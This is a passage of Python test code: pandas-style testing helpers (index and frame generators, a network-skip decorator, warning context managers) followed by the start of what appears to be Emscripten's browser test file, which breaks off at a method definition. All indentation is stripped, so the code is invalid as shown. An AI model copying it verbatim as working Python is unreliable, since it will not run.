# Just ensure a
pass
if check_fill_value:
assert_attr_equal("fill_value", left, right)
if check_dtype:
assert_attr_equal("dtype", left, right)
assert_numpy_array_equal(left.to_dense(), right.to_dense(), check_dtype=check_dtype)
# -----------------------------------------------------------------------------
# Others
def assert_contains_all(iterable, dic):
for k in iterable:
assert k in dic, f"Did not contain item: {repr(k)}"
def assert_copy(iter1, iter2, **eql_kwargs):
"""
iter1, iter2: iterables that produce elements
comparable with assert_almost_equal
Checks that the elements are equal, but not
the same object. (Does not check that items
in sequences are also not the same object)
"""
for elem1, elem2 in zip(iter1, iter2):
assert_almost_equal(elem1, elem2, **eql_kwargs)
msg = (
f"Expected object {repr(type(elem1))} and object {repr(type(elem2))} to be "
"different objects, but they were the same object."
)
assert elem1 is not elem2, msg
def getCols(k):
return string.ascii_uppercase[:k]
# make index
def makeStringIndex(k=10, name=None):
return Index(rands_array(nchars=10, size=k), name=name)
def makeUnicodeIndex(k=10, name=None):
return Index(randu_array(nchars=10, size=k), name=name)
def makeCategoricalIndex(k=10, n=3, name=None, **kwargs):
""" make a length k index or n categories """
x = rands_array(nchars=4, size=n)
return CategoricalIndex(
Categorical.from_codes(np.arange(k) % n, categories=x), name=name, **kwargs
)
def makeIntervalIndex(k=10, name=None, **kwargs):
""" make a length k IntervalIndex """
x = np.linspace(0, 100, num=(k + 1))
return IntervalIndex.from_breaks(x, name=name, **kwargs)
def makeBoolIndex(k=10, name=None):
if k == 1:
return Index([True], name=name)
elif k == 2:
return Index([False, True], name=name)
return Index([False, True] + [False] * (k - 2), name=name)
def makeIntIndex(k=10, name=None):
return Index(list(range(k)), name=name)
def makeUIntIndex(k=10, name=None):
return Index([2 ** 63 + i for i in range(k)], name=name)
def makeRangeIndex(k=10, name=None, **kwargs):
return RangeIndex(0, k, 1, name=name, **kwargs)
def makeFloatIndex(k=10, name=None):
values = sorted(np.random.random_sample(k)) - np.random.random_sample(1)
return Index(values * (10 ** np.random.randint(0, 9)), name=name)
def makeDateIndex(k=10, freq="B", name=None, **kwargs):
dt = datetime(2000, 1, 1)
dr = bdate_range(dt, periods=k, freq=freq, name=name)
return DatetimeIndex(dr, name=name, **kwargs)
def makeTimedeltaIndex(k=10, freq="D", name=None, **kwargs):
return pd.timedelta_range(start="1 day", periods=k, freq=freq, name=name, **kwargs)
def makePeriodIndex(k=10, name=None, **kwargs):
dt = datetime(2000, 1, 1)
dr = pd.period_range(start=dt, periods=k, freq="B", name=name, **kwargs)
return dr
def makeMultiIndex(k=10, names=None, **kwargs):
return MultiIndex.from_product((("foo", "bar"), (1, 2)), names=names, **kwargs)
_names = [
"Alice",
"Bob",
"Charlie",
"Dan",
"Edith",
"Frank",
"George",
"Hannah",
"Ingrid",
"Jerry",
"Kevin",
"Laura",
"Michael",
"Norbert",
"Oliver",
"Patricia",
"Quinn",
"Ray",
"Sarah",
"Tim",
"Ursula",
"Victor",
"Wendy",
"Xavier",
"Yvonne",
"Zelda",
]
def _make_timeseries(start="2000-01-01", end="2000-12-31", freq="1D", seed=None):
"""
Make a DataFrame with a DatetimeIndex
Parameters
----------
start : str or Timestamp, default "2000-01-01"
The start of the index. Passed to date_range with `freq`.
end : str or Timestamp, default "2000-12-31"
The end of the index. Passed to date_range with `freq`.
freq : str or Freq
The frequency to use for the DatetimeIndex
seed : int, optional
The random state seed.
* name : object dtype with string names
* id : int dtype with
* x, y : float dtype
Examples
--------
>>> _make_timeseries()
id name x y
timestamp
2000-01-01 982 Frank 0.031261 0.986727
2000-01-02 1025 Edith -0.086358 -0.032920
2000-01-03 982 Edith 0.473177 0.298654
2000-01-04 1009 Sarah 0.534344 -0.750377
2000-01-05 963 Zelda -0.271573 0.054424
... ... ... ... ...
2000-12-27 980 Ingrid -0.132333 -0.422195
2000-12-28 972 Frank -0.376007 -0.298687
2000-12-29 1009 Ursula -0.865047 -0.503133
2000-12-30 1000 Hannah -0.063757 -0.507336
2000-12-31 972 Tim -0.869120 0.531685
"""
index = pd.date_range(start=start, end=end, freq=freq, name="timestamp")
n = len(index)
state = np.random.RandomState(seed)
columns = {
"name": state.choice(_names, size=n),
"id": state.poisson(1000, size=n),
"x": state.rand(n) * 2 - 1,
"y": state.rand(n) * 2 - 1,
}
df = pd.DataFrame(columns, index=index, columns=sorted(columns))
if df.index[-1] == end:
df = df.iloc[:-1]
return df
def all_index_generator(k=10):
"""Generator which can be iterated over to get instances of all the various
index classes.
Parameters
----------
k: length of each of the index instances
"""
all_make_index_funcs = [
makeIntIndex,
makeFloatIndex,
makeStringIndex,
makeUnicodeIndex,
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
makeBoolIndex,
makeRangeIndex,
makeIntervalIndex,
makeCategoricalIndex,
]
for make_index_func in all_make_index_funcs:
yield make_index_func(k=k)
def index_subclass_makers_generator():
make_index_funcs = [
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
makeRangeIndex,
makeIntervalIndex,
makeCategoricalIndex,
makeMultiIndex,
]
for make_index_func in make_index_funcs:
yield make_index_func
def all_timeseries_index_generator(k=10):
"""Generator which can be iterated over to get instances of all the classes
which represent time-series.
Parameters
----------
k: length of each of the index instances
"""
make_index_funcs = [makeDateIndex, makePeriodIndex, makeTimedeltaIndex]
for make_index_func in make_index_funcs:
yield make_index_func(k=k)
# make series
def makeFloatSeries(name=None):
index = makeStringIndex(N)
return Series(randn(N), index=index, name=name)
def makeStringSeries(name=None):
index = makeStringIndex(N)
return Series(randn(N), index=index, name=name)
def makeObjectSeries(name=None):
data = makeStringIndex(N)
data = Index(data, dtype=object)
index = makeStringIndex(N)
return Series(data, index=index, name=name)
def getSeriesData():
index = makeStringIndex(N)
return {c: Series(randn(N), index=index) for c in getCols(K)}
def makeTimeSeries(nper=None, freq="B", name=None):
if nper is None:
nper = N
return Series(randn(nper), index=makeDateIndex(nper, freq=freq), name=name)
def makePeriodSeries(nper=None, name=None):
if nper is None:
nper = N
return Series(randn(nper), index=makePeriodIndex(nper), name=name)
def getTimeSeriesData(nper=None, freq="B"):
return {c: makeTimeSeries(nper, freq) for c in getCols(K)}
def getPeriodData(nper=None):
return {c: makePeriodSeries(nper) for c in getCols(K)}
# make frame
def makeTimeDataFrame(nper=None, freq="B"):
data = getTimeSeriesData(nper, freq)
return DataFrame(data)
def makeDataFrame():
data = getSeriesData()
return DataFrame(data)
def getMixedTypeDict():
index = Index(["a", "b", "c", "d", "e"])
data = {
"A": [0.0, 1.0, 2.0, 3.0, 4.0],
"B": [0.0, 1.0, 0.0, 1.0, 0.0],
"C": ["foo1", "foo2", "foo3", "foo4", "foo5"],
"D": bdate_range("1/1/2009", periods=5),
}
return index, data
def makeMixedDataFrame():
return DataFrame(getMixedTypeDict()[1])
def makePeriodFrame(nper=None):
data = getPeriodData(nper)
return DataFrame(data)
def makeCustomIndex(
nentries, nlevels, prefix="#", names=False, ndupe_l=None, idx_type=None
):
"""Create an index/multindex with given dimensions, levels, names, etc'
nentries - number of entries in index
nlevels - number of levels (> 1 produces multindex)
prefix - a string prefix for labels
names - (Optional), bool or list of strings. if True will use default
names, if false will use no names, if a list is given, the name of
each level in the index will be taken from the list.
ndupe_l - (Optional), list of ints, the number of rows for which the
label will repeated at the corresponding level, you can specify just
the first few, the rest will use the default ndupe_l of 1.
len(ndupe_l) <= nlevels.
idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a datetime index.
if unspecified, string labels will be generated.
"""
if ndupe_l is None:
ndupe_l = [1] * nlevels
assert is_sequence(ndupe_l) and len(ndupe_l) <= nlevels
assert names is None or names is False or names is True or len(names) is nlevels
assert idx_type is None or (
idx_type in ("i", "f", "s", "u", "dt", "p", "td") and nlevels == 1
)
if names is True:
# build default names
names = [prefix + str(i) for i in range(nlevels)]
if names is False:
# pass None to index constructor for no name
names = None
# make singleton case uniform
if isinstance(names, str) and nlevels == 1:
names = [names]
# specific 1D index type requested?
idx_func = dict(
i=makeIntIndex,
f=makeFloatIndex,
s=makeStringIndex,
u=makeUnicodeIndex,
dt=makeDateIndex,
td=makeTimedeltaIndex,
p=makePeriodIndex,
).get(idx_type)
if idx_func:
idx = idx_func(nentries)
# but we need to fill in the name
if names:
idx.name = names[0]
return idx
elif idx_type is not None:
raise ValueError(
f"{repr(idx_type)} is not a legal value for `idx_type`, "
"use 'i'/'f'/'s'/'u'/'dt'/'p'/'td'."
)
if len(ndupe_l) < nlevels:
ndupe_l.extend([1] * (nlevels - len(ndupe_l)))
assert len(ndupe_l) == nlevels
assert all(x > 0 for x in ndupe_l)
tuples = []
for i in range(nlevels):
def keyfunc(x):
import re
numeric_tuple = re.sub(r"[^\d_]_?", "", x).split("_")
return [int(num) for num in numeric_tuple]
# build a list of lists to create the index from
div_factor = nentries // ndupe_l[i] + 1
cnt = Counter()
for j in range(div_factor):
label = f"{prefix}_l{i}_g{j}"
cnt[label] = ndupe_l[i]
# cute Counter trick
result = sorted(cnt.elements(), key=keyfunc)[:nentries]
tuples.append(result)
tuples = list(zip(*tuples))
# convert tuples to index
if nentries == 1:
# we have a single level of tuples, i.e. a regular Index
index = Index(tuples[0], name=names[0])
elif nlevels == 1:
name = None if names is None else names[0]
index = Index((x[0] for x in tuples), name=name)
else:
index = MultiIndex.from_tuples(tuples, names=names)
return index
def makeCustomDataframe(
nrows,
ncols,
c_idx_names=True,
r_idx_names=True,
c_idx_nlevels=1,
r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None,
r_ndupe_l=None,
dtype=None,
c_idx_type=None,
r_idx_type=None,
):
"""
Create a DataFrame using supplied parameters.
Parameters
----------
nrows, ncols - number of data rows/cols
c_idx_names, idx_names - False/True/list of strings, yields No names ,
default names or uses the provided names for the levels of the
corresponding index. You can provide a single string when
c_idx_nlevels ==1.
c_idx_nlevels - number of levels in columns index. > 1 will yield MultiIndex
r_idx_nlevels - number of levels in rows index. > 1 will yield MultiIndex
data_gen_f - a function f(row,col) which return the data value
at that position, the default generator used yields values of the form
"RxCy" based on position.
c_ndupe_l, r_ndupe_l - list of integers, determines the number
of duplicates for each label at a given level of the corresponding
index. The default `None` value produces a multiplicity of 1 across
all levels, i.e. a unique index. Will accept a partial list of length
N < idx_nlevels, for just the first N levels. If ndupe doesn't divide
nrows/ncol, the last label might have lower multiplicity.
dtype - passed to the DataFrame constructor as is, in case you wish to
have more control in conjunction with a custom `data_gen_f`
r_idx_type, c_idx_type - "i"/"f"/"s"/"u"/"dt"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a timedelta index.
if unspecified, string labels will be generated.
Examples
--------
# 5 row, 3 columns, default names on both, single index on both axis
>> makeCustomDataframe(5,3)
# make the data a random int between 1 and 100
>> mkdf(5,3,data_gen_f=lambda r,c:randint(1,100))
# 2-level multiindex on rows with each label duplicated
# twice on first level, default names on both axis, single
# index on both axis
>> a=makeCustomDataframe(5,3,r_idx_nlevels=2,r_ndupe_l=[2])
# DatetimeIndex on row, index with unicode labels on columns
# no names on either axis
>> a=makeCustomDataframe(5,3,c_idx_names=False,r_idx_names=False,
r_idx_type="dt",c_idx_type="u")
# 4-level multindex on rows with names provided, 2-level multindex
# on columns with default labels and default names.
>> a=makeCustomDataframe(5,3,r_idx_nlevels=4,
r_idx_names=["FEE","FI","FO","FAM"],
c_idx_nlevels=2)
>> a=mkdf(5,3,r_idx_nlevels=2,c_idx_nlevels=4)
"""
assert c_idx_nlevels > 0
assert r_idx_nlevels > 0
assert r_idx_type is None or (
r_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and r_idx_nlevels == 1
)
assert c_idx_type is None or (
c_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and c_idx_nlevels == 1
)
columns = makeCustomIndex(
ncols,
nlevels=c_idx_nlevels,
prefix="C",
names=c_idx_names,
ndupe_l=c_ndupe_l,
idx_type=c_idx_type,
)
index = makeCustomIndex(
nrows,
nlevels=r_idx_nlevels,
prefix="R",
names=r_idx_names,
ndupe_l=r_ndupe_l,
idx_type=r_idx_type,
)
# by default, generate data based on location
if data_gen_f is None:
data_gen_f = lambda r, c: f"R{r}C{c}"
data = [[data_gen_f(r, c) for c in range(ncols)] for r in range(nrows)]
return DataFrame(data, index, columns, dtype=dtype)
def _create_missing_idx(nrows, ncols, density, random_state=None):
if random_state is None:
random_state = np.random
else:
random_state = np.random.RandomState(random_state)
# below is cribbed from scipy.sparse
size = int(np.round((1 - density) * nrows * ncols))
# generate a few more to ensure unique values
min_rows = 5
fac = 1.02
extra_size = min(size + min_rows, fac * size)
def _gen_unique_rand(rng, _extra_size):
ind = rng.rand(int(_extra_size))
return np.unique(np.floor(ind * nrows * ncols))[:size]
ind = _gen_unique_rand(random_state, extra_size)
while ind.size < size:
extra_size *= 1.05
ind = _gen_unique_rand(random_state, extra_size)
j = np.floor(ind * 1.0 / nrows).astype(int)
i = (ind - j * nrows).astype(int)
return i.tolist(), j.tolist()
def makeMissingCustomDataframe(
nrows,
ncols,
density=0.9,
random_state=None,
c_idx_names=True,
r_idx_names=True,
c_idx_nlevels=1,
r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None,
r_ndupe_l=None,
dtype=None,
c_idx_type=None,
r_idx_type=None,
):
"""
Parameters
----------
Density : float, optional
Float in (0, 1) that gives the percentage of non-missing numbers in
the DataFrame.
random_state : {np.random.RandomState, int}, optional
Random number generator or random seed.
See makeCustomDataframe for descriptions of the rest of the parameters.
"""
df = makeCustomDataframe(
nrows,
ncols,
c_idx_names=c_idx_names,
r_idx_names=r_idx_names,
c_idx_nlevels=c_idx_nlevels,
r_idx_nlevels=r_idx_nlevels,
data_gen_f=data_gen_f,
c_ndupe_l=c_ndupe_l,
r_ndupe_l=r_ndupe_l,
dtype=dtype,
c_idx_type=c_idx_type,
r_idx_type=r_idx_type,
)
i, j = _create_missing_idx(nrows, ncols, density, random_state)
df.values[i, j] = np.nan
return df
def makeMissingDataframe(density=0.9, random_state=None):
df = makeDataFrame()
i, j = _create_missing_idx(*df.shape, density=density, random_state=random_state)
df.values[i, j] = np.nan
return df
def optional_args(decorator):
"""allows a decorator to take optional positional and keyword arguments.
Assumes that taking a single, callable, positional argument means that
it is decorating a function, i.e. something like this::
@my_decorator
def function(): pass
Calls decorator with decorator(f, *args, **kwargs)
"""
@wraps(decorator)
def wrapper(*args, **kwargs):
def dec(f):
return decorator(f, *args, **kwargs)
is_decorating = not kwargs and len(args) == 1 and callable(args[0])
if is_decorating:
f = args[0]
args = []
return dec(f)
else:
return dec
return wrapper
# skip tests on exceptions with this message
_network_error_messages = (
# 'urlopen error timed out',
# 'timeout: timed out',
# 'socket.timeout: timed out',
"timed out",
"Server Hangup",
"HTTP Error 503: Service Unavailable",
"502: Proxy Error",
"HTTP Error 502: internal error",
"HTTP Error 502",
"HTTP Error 503",
"HTTP Error 403",
"HTTP Error 400",
"Temporary failure in name resolution",
"Name or service not known",
"Connection refused",
"certificate verify",
)
# or this e.errno/e.reason.errno
_network_errno_vals = (
101, # Network is unreachable
111, # Connection refused
110, # Connection timed out
104, # Connection reset Error
54, # Connection reset by peer
60, # urllib.error.URLError: [Errno 60] Connection timed out
)
# Both of the above shouldn't mask real issues such as 404's
# or refused connections (changed DNS).
# But some tests (test_data yahoo) contact incredibly flakey
# servers.
# and conditionally raise on exception types in _get_default_network_errors
def _get_default_network_errors():
# Lazy import for http.client because it imports many things from the stdlib
import http.client
return (IOError, http.client.HTTPException, TimeoutError)
def can_connect(url, error_classes=None):
"""Try to connect to the given url. True if succeeds, False if IOError
raised
Parameters
----------
url : basestring
The URL to try to connect to
Returns
-------
connectable : bool
Return True if no IOError (unable to connect) or URLError (bad url) was
raised
"""
if error_classes is None:
error_classes = _get_default_network_errors()
try:
with urlopen(url):
pass
except error_classes:
return False
else:
return True
@optional_args
def network(
t,
url="http://www.google.com",
raise_on_error=_RAISE_NETWORK_ERROR_DEFAULT,
check_before_test=False,
error_classes=None,
skip_errnos=_network_errno_vals,
_skip_on_messages=_network_error_messages,
):
"""
Label a test as requiring network connection and, if an error is
encountered, only raise if it does not find a network connection.
In comparison to ``network``, this assumes an added contract to your test:
you must assert that, under normal conditions, your test will ONLY fail if
it does not have network connectivity.
You can call this in 3 ways: as a standard decorator, with keyword
arguments, or with a positional argument that is the url to check.
Parameters
----------
t : callable
The test requiring network connectivity.
url : path
The url to test via ``pandas.io.common.urlopen`` to check
for connectivity. Defaults to 'http://www.google.com'.
raise_on_error : bool
If True, never catches errors.
check_before_test : bool
If True, checks connectivity before running the test case.
error_classes : tuple or Exception
error classes to ignore. If not in ``error_classes``, raises the error.
defaults to IOError. Be careful about changing the error classes here.
skip_errnos : iterable of int
Any exception that has .errno or .reason.erno set to one
of these values will be skipped with an appropriate
message.
_skip_on_messages: iterable of string
any exception e for which one of the strings is
a substring of str(e) will be skipped with an appropriate
message. Intended to suppress errors where an errno isn't available.
Notes
-----
* ``raise_on_error`` supercedes ``check_before_test``
Returns
-------
t : callable
The decorated test ``t``, with checks for connectivity errors.
Example
-------
Tests decorated with @network will fail if it's possible to make a network
connection to another URL (defaults to google.com)::
>>> from pandas._testing import network
>>> from pandas.io.common import urlopen
>>> @network
... def test_network():
... with urlopen("rabbit://bonanza.com"):
... pass
Traceback
...
URLError: <urlopen error unknown url type: rabit>
You can specify alternative URLs::
>>> @network("http://www.yahoo.com")
... def test_something_with_yahoo():
... raise IOError("Failure Message")
>>> test_something_with_yahoo()
Traceback (most recent call last):
...
IOError: Failure Message
If you set check_before_test, it will check the url first and not run the
test on failure::
>>> @network("failing://url.blaher", check_before_test=True)
... def test_something():
... print("I ran!")
... raise ValueError("Failure")
>>> test_something()
Traceback (most recent call last):
...
Errors not related to networking will always be raised.
"""
from pytest import skip
if error_classes is None:
error_classes = _get_default_network_errors()
t.network = True
@wraps(t)
def wrapper(*args, **kwargs):
if check_before_test and not raise_on_error:
if not can_connect(url, error_classes):
skip()
try:
return t(*args, **kwargs)
except Exception as err:
errno = getattr(err, "errno", None)
if not errno and hasattr(errno, "reason"):
errno = getattr(err.reason, "errno", None)
if errno in skip_errnos:
skip(f"Skipping test due to known errno and error {err}")
e_str = str(err)
if any(m.lower() in e_str.lower() for m in _skip_on_messages):
skip(
f"Skipping test because exception message is known and error {err}"
)
if not isinstance(err, error_classes):
raise
if raise_on_error or can_connect(url, error_classes):
raise
else:
skip(f"Skipping test due to lack of connectivity and error {err}")
return wrapper
with_connectivity_check = network
@contextmanager
def assert_produces_warning(
expected_warning=Warning,
filter_level="always",
clear=None,
check_stacklevel=True,
raise_on_extra_warnings=True,
):
"""
Context manager for running code expected to either raise a specific
warning, or not raise any warnings. Verifies that the code raises the
expected warning, and that it does not raise any other unexpected
warnings. It is basically a wrapper around ``warnings.catch_warnings``.
Parameters
----------
expected_warning : {Warning, False, None}, default Warning
The type of Exception raised. ``exception.Warning`` is the base
class for all warnings. To check that no warning is returned,
specify ``False`` or ``None``.
filter_level : str or None, default "always"
Specifies whether warnings are ignored, displayed, or turned
into errors.
Valid values are:
* "error" - turns matching warnings into exceptions
* "ignore" - discard the warning
* "always" - always emit a warning
* "default" - print the warning the first time it is generated
from each location
* "module" - print the warning the first time it is generated
from each module
* "once" - print the warning the first time it is generated
clear : str, default None
If not ``None`` then remove any previously raised warnings from
the ``__warningsregistry__`` to ensure that no warning messages are
suppressed by this context manager. If ``None`` is specified,
the ``__warningsregistry__`` keeps track of which warnings have been
shown, and does not show them again.
check_stacklevel : bool, default True
If True, displays the line that called the function containing
the warning to show were the function is called. Otherwise, the
line that implements the function is displayed.
raise_on_extra_warnings : bool, default True
Whether extra warnings not of the type `expected_warning` should
cause the test to fail.
Examples
--------
>>> import warnings
>>> with assert_produces_warning():
... warnings.warn(UserWarning())
...
>>> with assert_produces_warning(False):
... warnings.warn(RuntimeWarning())
...
Traceback (most recent call last):
...
AssertionError: Caused unexpected warning(s): ['RuntimeWarning'].
>>> with assert_produces_warning(UserWarning):
... warnings.warn(RuntimeWarning())
Traceback (most recent call last):
...
AssertionError: Did not see expected warning of class 'UserWarning'.
..warn:: This is *not* thread-safe.
"""
__tracebackhide__ = True
with warnings.catch_warnings(record=True) as w:
if clear is not None:
# make sure that we are clearing these warnings
# if they have happened before
# to guarantee that we will catch them
if not is_list_like(clear):
clear = [clear]
for m in clear:
try:
m.__warningregistry__.clear()
except AttributeError:
# module may not have __warningregistry__
pass
saw_warning = False
warnings.simplefilter(filter_level)
yield w
extra_warnings = []
for actual_warning in w:
if expected_warning and issubclass(
actual_warning.category, expected_warning
):
saw_warning = True
if check_stacklevel and issubclass(
actual_warning.category, (FutureWarning, DeprecationWarning)
):
from inspect import getframeinfo, stack
caller = getframeinfo(stack()[2][0])
msg = (
"Warning not set with correct stacklevel. "
f"File where warning is raised: {actual_warning.filename} != "
f"{caller.filename}. Warning message: {actual_warning.message}"
)
assert actual_warning.filename == caller.filename, msg
else:
extra_warnings.append(
(
actual_warning.category.__name__,
actual_warning.message,
actual_warning.filename,
actual_warning.lineno,
)
)
if expected_warning:
msg = (
f"Did not see expected warning of class "
f"{repr(expected_warning.__name__)}"
)
assert saw_warning, msg
if raise_on_extra_warnings and extra_warnings:
raise AssertionError(
f"Caused unexpected warning(s): {repr(extra_warnings)}"
)
class RNGContext:
"""
Context manager to set the numpy random number generator speed. Returns
to the original value upon exiting the context manager.
Parameters
----------
seed : int
Seed for numpy.random.seed
Examples
--------
with RNGContext(42):
np.random.randn()
"""
def __init__(self, seed):
self.seed = seed
def __enter__(self):
self.start_state = np.random.get_state()
np.random.seed(self.seed)
def __exit__(self, exc_type, exc_value, traceback):
np.random.set_state(self.start_state)
@contextmanager
def with_csv_dialect(name, **kwargs):
"""
Context manager to temporarily register a CSV dialect for parsing CSV.
Parameters
----------
name : str
The name of the dialect.
kwargs : mapping
The parameters for the dialect.
Raises
------
ValueError : the name of the dialect conflicts with a builtin one.
See Also
--------
csv : Python's CSV library.
"""
import csv
_BUILTIN_DIALECTS = {"excel", "excel-tab", "unix"}
if name in _BUILTIN_DIALECTS:
raise ValueError("Cannot override builtin dialect.")
csv.register_dialect(name, **kwargs)
yield
csv.unregister_dialect(name)
@contextmanager
def use_numexpr(use, min_elements=None):
from pandas.core.computation import expressions as expr
if min_elements is None:
min_elements = expr._MIN_ELEMENTS
olduse = expr._USE_NUMEXPR
oldmin = expr._MIN_ELEMENTS
expr.set_use_numexpr(use)
expr._MIN_ELEMENTS = min_elements
yield
expr._MIN_ELEMENTS = oldmin
expr.set_use_numexpr(olduse)
def test_parallel(num_threads=2, kwargs_list=None):
"""Decorator to run the same function multiple times in parallel.
Parameters
----------
num_threads : int, optional
The number of times the function is run in parallel.
kwargs_list : list of dicts, optional
The list of kwargs to update original
function kwargs on different threads.
Notes
-----
This decorator does not pass the return value of the decorated function.
Original from scikit-image:
https://github.com/scikit-image/scikit-image/pull/1519
"""
assert num_threads > 0
has_kwargs_list = kwargs_list is not None
if has_kwargs_list:
assert len(kwargs_list) == num_threads
import threading
def wrapper(func):
@wraps(func)
def inner(*args, **kwargs):
if has_kwargs_list:
update_kwargs = lambda i: dict(kwargs, **kwargs_list[i])
else:
update_kwargs = lambda i: kwargs
threads = []
for i in range(num_threads):
updated_kwargs = update_kwargs(i)
thread = threading.Thread(target=func, args=args, kwargs=updated_kwargs)
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return inner
return wrapper
class SubclassedSeries(Series):
_metadata = ["testattr", "name"]
@property
def _constructor(self):
return SubclassedSeries
@property
def _constructor_expanddim(self):
return SubclassedDataFrame
class SubclassedDataFrame(DataFrame):
_metadata = ["testattr"]
@property
def _constructor(self):
return SubclassedDataFrame
@property
def _constructor_sliced(self):
return SubclassedSeries
class SubclassedCategorical(Categorical):
@property
def _constructor(self):
return SubclassedCategorical
@contextmanager
def set_timezone(tz: str):
"""
Context manager for temporarily setting a timezone.
Parameters
----------
tz : str
A string representing a valid timezone.
Examples
--------
>>> from datetime import datetime
>>> from dateutil.tz import tzlocal
>>> tzlocal().tzname(datetime.now())
'IST'
>>> with set_timezone('US/Eastern'):
... tzlocal().tzname(datetime.now())
...
'EDT'
"""
import os
import time
def setTZ(tz):
if tz is None:
try:
del os.environ["TZ"]
except KeyError:
pass
else:
os.environ["TZ"] = tz
time.tzset()
orig_tz = os.environ.get("TZ")
setTZ(tz)
try:
yield
finally:
setTZ(orig_tz)
def _make_skipna_wrapper(alternative, skipna_alternative=None):
"""
Create a function for calling on an array.
Parameters
----------
alternative : function
The function to be called on the array with no NaNs.
Only used when 'skipna_alternative' is None.
skipna_alternative : function
The function to be called on the original array
Returns
-------
function
"""
if skipna_alternative:
def skipna_wrapper(x):
return skipna_alternative(x.values)
else:
def skipna_wrapper(x):
nona = x.dropna()
if len(nona) == 0:
return np.nan
return alternative(nona)
return skipna_wrapper
def convert_rows_list_to_csv_str(rows_list: List[str]):
"""
Convert list of CSV rows to single CSV-formatted string for current OS.
This method is used for creating expected value of to_csv() method.
Parameters
----------
rows_list : List[str]
Each element represents the row of csv.
Returns
-------
str
Expected output of to_csv() in current OS.
"""
sep = os.linesep
expected = sep.join(rows_list) + sep
return expected
def external_error_raised(
expected_exception: Type[Exception],
) -> Callable[[Type[Exception], None], None]:
"""
Helper function to mark pytest.raises that have an external error message.
Parameters
----------
expected_exception : Exception
Expected error to raise.
Returns
-------
Callable
Regular `pytest.raises` function with `match` equal to `None`.
"""
import pytest
return pytest.raises(expected_exception, match=None)
|
test_browser.py
|
# coding=utf-8
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
import argparse
import json
import multiprocessing
import os
import random
import shlex
import shutil
import subprocess
import time
import unittest
import webbrowser
import zlib
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.request import urlopen
from runner import BrowserCore, RunnerCore, path_from_root, has_browser, EMTEST_BROWSER, Reporting
from runner import create_file, parameterized, ensure_dir, disabled, test_file
from tools import building
from tools import shared
from tools import system_libs
from tools.shared import PYTHON, EMCC, WINDOWS, FILE_PACKAGER, PIPE
from tools.shared import try_delete, config
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum, port):
class ChunkedServerHandler(BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:%s" % port)
s.send_header('Cross-Origin-Resource-Policy', 'cross-origin')
s.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if s.path == '/':
s.sendheaders()
elif not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
start, end = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data) - 1, end)
length = end - start + 1
s.sendheaders([], length)
s.wfile.write(data[start:end + 1])
# CORS preflight makes OPTIONS requests which we need to account for.
expectedConns = 22
httpd = HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns + 1):
httpd.handle_request()
def shell_with_script(shell_file, output_file, replacement):
with open(path_from_root('src', shell_file)) as input:
with open(output_file, 'w') as output:
output.write(input.read().replace('{{{ SCRIPT }}}', replacement))
def is_chrome():
return EMTEST_BROWSER and 'chrom' in EMTEST_BROWSER.lower()
def no_chrome(note='chrome is not supported'):
if is_chrome():
return unittest.skip(note)
return lambda f: f
def is_firefox():
return EMTEST_BROWSER and 'firefox' in EMTEST_BROWSER.lower()
def no_firefox(note='firefox is not supported'):
if is_firefox():
return unittest.skip(note)
return lambda f: f
def no_swiftshader(f):
assert callable(f)
def decorated(self):
if is_chrome() and '--use-gl=swiftshader' in EMTEST_BROWSER:
self.skipTest('not compatible with swiftshader')
return f(self)
return decorated
def requires_threads(f):
assert callable(f)
def decorated(self, *args, **kwargs):
if os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'):
self.skipTest('EMTEST_LACKS_THREAD_SUPPORT is set')
return f(self, *args, **kwargs)
return decorated
def requires_asmfs(f):
assert callable(f)
def decorated(self, *args, **kwargs):
# https://github.com/emscripten-core/emscripten/issues/9534
self.skipTest('ASMFS is looking for a maintainer')
return f(self, *args, **kwargs)
return decorated
# Today we only support the wasm backend so any tests that is disabled under the llvm
# backend is always disabled.
# TODO(sbc): Investigate all tests with this decorator and either fix of remove the test.
def no_wasm_backend(note=''):
assert not callable(note)
return unittest.skip(note)
requires_graphics_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_GRAPHICS_HARDWARE'), "This test requires graphics hardware")
requires_sound_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_SOUND_HARDWARE'), "This test requires sound hardware")
requires_sync_compilation = unittest.skipIf(is_chrome(), "This test requires synchronous compilation, which does not work in Chrome (except for tiny wasms)")
requires_offscreen_canvas = unittest.skipIf(os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'), "This test requires a browser with OffscreenCanvas")
class browser(BrowserCore):
@classmethod
def setUpClass(cls):
super(browser, cls).setUpClass()
cls.browser_timeout = 60
print()
print('Running the browser tests. Make sure the browser allows popups from localhost.')
print()
def setUp(self):
